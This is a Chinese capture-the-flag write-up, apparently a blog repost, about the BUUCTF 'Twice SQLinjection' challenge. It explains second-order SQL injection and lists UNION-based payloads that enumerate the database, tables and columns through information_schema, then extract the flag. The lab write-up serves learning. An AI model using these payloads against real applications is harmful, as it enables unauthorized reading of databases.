当前位置: 首页 > article >正文

53,【3】BUUCTF WEB october 2019 Twice SQLinjection

053fd844613648269cfa92c345617a03.jpeg

题目得到信息,2次注入,进入靶场

1bed2ba1ddbe49d48660e961cc1cecf1.png

登录页面,很自然想到SQL

9bf36d4e95f049eaad9ddc4d626fb53a.png

6cb732ce6b5a400692937fe0e3329448.png

第一次注入应该是这个可以登录,注册,提交简介的页面

第二次注入应该是在info处注入,信息显示在简介处

 

我真的纯脑子有病,人家二次注入不是注入两次,是一次注入通过两次操作实现,如下所示

 

c7c188d6ea86469b95af8fbe0b1706d6.png

 

dacb5d487f4c4ca59446295880cbef99.png

被转义了

不过恶意语句输两次就可以了

 

75e48ae2e25b4e939ecce560119cca79.png

e6c51c0fffd140c7a6f5a3670cdbdcc7.png

911cc4aa612a4b1e8497f96b8d64e800.png

database()库名ctftraining

a17496f4f5be41d7884cb3419eefbd41.png

e71189ea94ac4b509d994ac573ceccd1.png

e68207bddb3e41a589fd7fd122024f1d.png

1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#

表名flag,news,users

e22a6824ff9743daa567547f3bc19304.png

3917e7312c964c7592177bc45351c6ce.png

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

字段名flag

1' union select group_concat(flag) from ctftraining.flag#

4505ec8628a448fb8c8572a0f3e5e5f1.png

????注册失败????

修改修改

1' union select flag from ctftraining.flag#

985368fbf1c64b06ab857944b3684cfb.png

??????最后一步不显示flag

再修改修改

1' union select flag from flag#

c8d520751d63446db92a3e801d030780.png

这句就对了

得到flag

 

笔记

1,SQL注入还有2次注入的类型

2,爆出信息的语句需要多次修改

3,看到陌生词语先搜搜,不能想当然

 

 


http://www.kler.cn/a/511381.html

相关文章:

  • gitignore忽略已经提交过的
  • redis性能优化参考——筑梦之路
  • 力扣hot100之螺旋矩阵
  • 用户中心项目教程(二)---umi3的使用出现的错误
  • 【JavaEE】Spring Web MVC
  • 解决 MySQL 服务无法启动:failed to restart mysql.service unit not found
  • 82.提取条件模式
  • BUUCTF_Web([GYCTF2020]Ezsqli)
  • Linux中的文件上传和下载
  • 前后端分离的Java快速开发平台
  • 【万图找码】在大量图片中快速找出有二维码的图片
  • TP4056锂电池充放电芯片教程文章详解·内置驱动电路资源!!!
  • Web3 时代,区块链与物联网的融合创新前景
  • Axios 封装:处理重复调用与内容覆盖问题
  • node_exporter 集成Prometheus+Grafana
  • ingress-nginx代理tcp使其能外部访问mysql
  • reac 后端接口返回二进制文件流前端导出文件
  • 主控制器与子模块通讯协议
  • 要获取本地的公网 IP 地址(curl ifconfig.me)
  • 【Compose multiplatform教程】05 IOS环境编译
  • Linux(DISK:raid5、LVM逻辑卷)
  • 基于GRU实现股价多变量时间序列预测(PyTorch版)
  • 数据结构-顺序表链表经典OJ题
  • RabbitMQ集群安装rabbitmq_delayed_message_exchange
  • 【数据库知识】PostgreSQL介绍
  • 学英语学技术: jmeter插件管理器